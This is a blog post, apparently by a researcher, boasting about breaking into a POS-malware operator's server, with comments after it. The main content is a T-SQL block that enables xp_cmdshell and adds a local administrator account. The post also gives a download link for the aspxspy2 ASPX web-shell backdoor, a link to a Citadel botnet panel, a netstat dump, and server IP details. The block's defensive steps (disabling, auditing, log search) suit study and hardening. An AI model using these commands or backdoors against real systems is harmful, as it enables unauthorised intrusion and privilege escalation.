a POS malware loaded via Andromeda, according to him.
I asked him to write something up, so I won't go into how this malware works; have a look here: http://aassfxxx.infos.st/article21/pos-malware-ram-scrapper
But as I told him in the comments... root the fucker!
The bad guys run a Windows server; Track 2 data is sent to it (or whatever else is grabbed; I haven't reversed the exe, so I don't know exactly what it collects).
Have to thank them for the bad configuration that lets you enable xp_cmdshell (LOL).
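What "enable xp_cmdshell" means in practice, as an added T-SQL example (not from the original post, and not the exact commands used there): check whether it is on, switch it on through sp_configure, run commands as the SQL Server service account, then the defender's side: switch it back off, list who could switch it on again, and pull the error-log evidence the change leaves. It assumes a login holding the sysadmin role (or ALTER SETTINGS); the account names and password are hypothetical.

```sql
-- Added example, not code from the original post. Needs sysadmin (or ALTER SETTINGS).
-- Account names and passwords below are hypothetical placeholders.

-- 1. Is xp_cmdshell currently enabled?  value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Attacker side. sp_configure refuses to touch xp_cmdshell until advanced
--    options are visible, and every change only applies after RECONFIGURE.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Commands run under the SQL Server service account; stdout comes back as a
--    result set. Adding a local admin is what turns this into RDP access later
--    (the account 'svc_backup' is hypothetical).
EXEC master..xp_cmdshell 'whoami';
EXEC master..xp_cmdshell 'net user svc_backup P@ssw0rd-Hypothetical /add';
EXEC master..xp_cmdshell 'net localgroup administrators svc_backup /add';

-- 4. Defender side: turn it back off ...
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- ... list every login that could turn it on again (sysadmin members; S = SQL
-- login, U = Windows login, G = Windows group) ...
SELECT sp.name, sp.type_desc
FROM sys.server_principals AS sp
WHERE sp.type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', sp.name) = 1;

-- ... and if some job really needs xp_cmdshell, give it a low-privilege proxy
-- account instead of sysadmin, so the shell does not run as the service account
-- (the credentials are hypothetical).
EXEC sp_xp_cmdshell_proxy_account 'DOMAIN\lowpriv', 'Hypothetical-Pw-1';

-- 5. Evidence: each sp_configure change is written to the SQL Server error log as
--    "Configuration option 'xp_cmdshell' changed from 0 to 1 ...". Search the
--    current log (0) of type SQL Server (1) for it.
EXEC xp_readerrorlog 0, 1, N'Configuration option', N'xp_cmdshell';
```

The check in step 1 is worth running before anything else: on a box where value_in_use is already 1, nobody needed to "enable" anything, and the error-log search in step 5 is what tells you when it happened and from which login.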
ASPX backdoor (aspxspy2)... it can be downloaded from rootkit.net.cn/code/aspxspy2.rar
VT: 31/46
RDPwned:
Users:
No more IIS please
They even use cracked apps:
Proto  Local Address          Foreign Address        State
TCP    93.170.130.109:443     98:43166               ESTABLISHED
TCP    93.170.130.109:56161   UBUNTU:microsoft-ds    ESTABLISHED
TCP    93.170.130.109:56360   mail:60586             SYN_SENT
TCP    127.0.0.1:1433         genuine:54808          ESTABLISHED
TCP    127.0.0.1:1433         genuine:56348          TIME_WAIT
TCP    127.0.0.1:54808        genuine:ms-sql-s       ESTABLISHED
TCP    127.0.0.1:56349        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56350        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56351        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56352        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56353        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56354        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56355        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56356        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56357        genuine:ms-sql-s       TIME_WAIT
TCP    127.0.0.1:56358        genuine:ms-sql-s       TIME_WAIT
Stuff grabbed:
More than 600 strings inside.
Not related, but also fun (cf. @MalwareScene):
INSERT INTO `bots` (`id`, `last_ip`, `last_online`, `new`, `version`, `traffic`, `command`, `regdate`) VALUES
('1', '84.22.122.6', 1299217483, 0, '8.0.0b', 1337, 'demo', '0000-00-00 00:00:00');
inetnum: 84.22.122.0 - 84.22.122.255
netname: A84-22-122-0
descr: REPUBLIC CYBERBUNKER INFRASTRUCTURE
role: Ministery of Telecommunications
address: One CyberBunker Avenue
address: CB-31337
address: CyberBunker-1
And finally... another idiot leaving stuff lying around, including the latest Citadel panel.
hxtp://monstercvv.cc/Citadel%201.3.5.1.zip
How did you get the RDP access? Weak password?
Added a user with xp_cmdshell
Why is index.php of Citadel empty?